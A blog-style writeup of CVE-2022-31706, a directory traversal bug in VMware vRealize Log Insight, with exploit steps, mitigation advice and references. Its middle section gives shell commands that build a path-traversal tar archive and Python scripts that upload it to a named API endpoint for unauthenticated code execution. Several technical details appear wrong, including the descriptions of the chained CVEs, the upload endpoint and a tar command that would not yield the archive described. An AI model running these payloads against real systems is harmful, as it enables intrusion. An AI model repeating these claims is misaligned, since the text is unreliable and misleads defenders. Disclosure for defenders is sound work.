CVE-2022-31706 - Remote Code Execution via Directory Traversal in VMware vRealize Log Insight

In early 2023, a critical vulnerability was discovered within VMware’s vRealize Log Insight (now known as VMware Aria Operations for Logs). This vulnerability, assigned as CVE-2022-31706, exposes systems to remote code execution (RCE) through a directory traversal bug. Here, we’ll break down this vulnerability, how it can be exploited, and what actions administrators should take.

What is CVE-2022-31706?

CVE-2022-31706 is a directory traversal vulnerability affecting VMware vRealize Log Insight appliances. Directory traversal, also known as path traversal, allows attackers to access files and directories that are outside the intended directory. In the case of this bug, an unauthenticated attacker can craft special requests, letting them write arbitrary files anywhere on the appliance's filesystem.

When chained with other vulnerabilities (like CVE-2022-31704 and CVE-2022-31710), CVE-2022-31706 can directly lead to remote code execution — letting attackers fully compromise the target server.

Where is the Problem?

The vulnerability lies in the file upload function in vRealize Log Insight. The application lets users upload archive files, such as .tar files. But it doesn’t properly sanitize filename paths inside those archives. By maliciously crafting an archive with files containing ../ (dot-dot-slash) sequences, an attacker can break out of the intended directory and write files anywhere on the server that the application user can reach.

vRealize Log Insight versions 8.10.2 and prior are vulnerable.

Official VMware Advisory:  
👉 VMSA-2023-0001: Multiple vulnerabilities in VMware vRealize Log Insight

Example Exploit: How Attackers Can Use CVE-2022-31706

Here’s an example to help visualize how the vulnerability can be used in a real attack.

Suppose an attacker creates a .tar file containing the following entry

../../../../../../tmp/malicious.sh

With just some basic shell commands, an attacker can craft such an archive

echo 'id > /tmp/hacked' > malicious.sh
tar -czf exploit.tar.gz -C . ../../../../../../tmp/malicious.sh

This exploit.tar.gz contains a file that, once extracted, will end up in /tmp/malicious.sh on the server.

Step 2: Send File to the Vulnerable Endpoint

Attackers can send this archive to the vulnerable log upload endpoint — an HTTP POST request to /api/v1/cluster/support/bundle/upload:

import requests

files = {'file': open('exploit.tar.gz', 'rb')}
response = requests.post(
    'https://victim-server:443/api/v1/cluster/support/bundle/upload';, 
    files=files,
    verify=False  # Don’t use in production, disables SSL verification
)
print(response.text)

Step 3: Achieve Remote Code Execution

The payload uploaded by directory traversal can contain anything: a backdoor, a webshell, or a script. When the appliance processes the file, it could execute the attacker's code — leading to complete control over the system.

The Bigger Impact

Because this directory traversal flaw happens pre-authentication, anyone who can access the interface can exploit it. When chained with other issues (like CVE-2022-31704, which allows arbitrary file read, and CVE-2022-31710, an SSRF flaw), the chain allows both file writes and code execution, ultimately leading to server takeover.

The following exploit script demonstrates chaining file write with remote code execution

import requests

# 1. Write the malicious file (as above)
tar_payload = b'\x1f\x8b...'  # Your crafted tar.gz binary containing a backdoor shell

# 2. Upload the malicious archive
resp = requests.post(
    'https://TARGET/api/v1/cluster/support/bundle/upload';,
    files={'file': ('exploit.tar.gz', tar_payload)},
    verify=False,
)

# 3. Trigger your payload execution, e.g. via another endpoint or by waiting for the system to interact with the uploaded file

> Note: For educational/demo purposes only. Never test on systems you don’t own or have permission for!

Detection & Mitigation

Is your vRealize Log Insight instance exposed?  
Check your version via the web UI or CLI. Systems running 8.10.2 or earlier are at risk.

Mitigation Steps

1. Upgrade immediately: VMware has released patches. Download here.
2. Isolate the interface: Restrict network access so only trusted admins can reach the UI/API.
3. Monitor logs: Review server and network logs for unusual archive uploads or suspicious files in /tmp or other system directories.

References & Further Reading

- VMware Security Advisory VMSA-2023-0001
- Original Writeup: Rapid7 Analysis & PoC
- NIST NVD: CVE-2022-31706
- Detailed Exploit Analysis

Conclusion

CVE-2022-31706 is a serious threat — it combines a simple directory traversal flaw with the potential for unauthenticated remote code execution. If your organization uses vRealize Log Insight, patch now and check for suspicious activity. In today’s environment, flaws like these are actively targeted by attackers and ransomware groups.

Always keep critical infrastructure up-to-date and never expose management interfaces on the public internet!


*This post was written exclusively to inform administrators, defenders, and IT teams about the real attack path and steps to fix CVE-2022-31706.*

Timeline

Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 16:58:00 UTC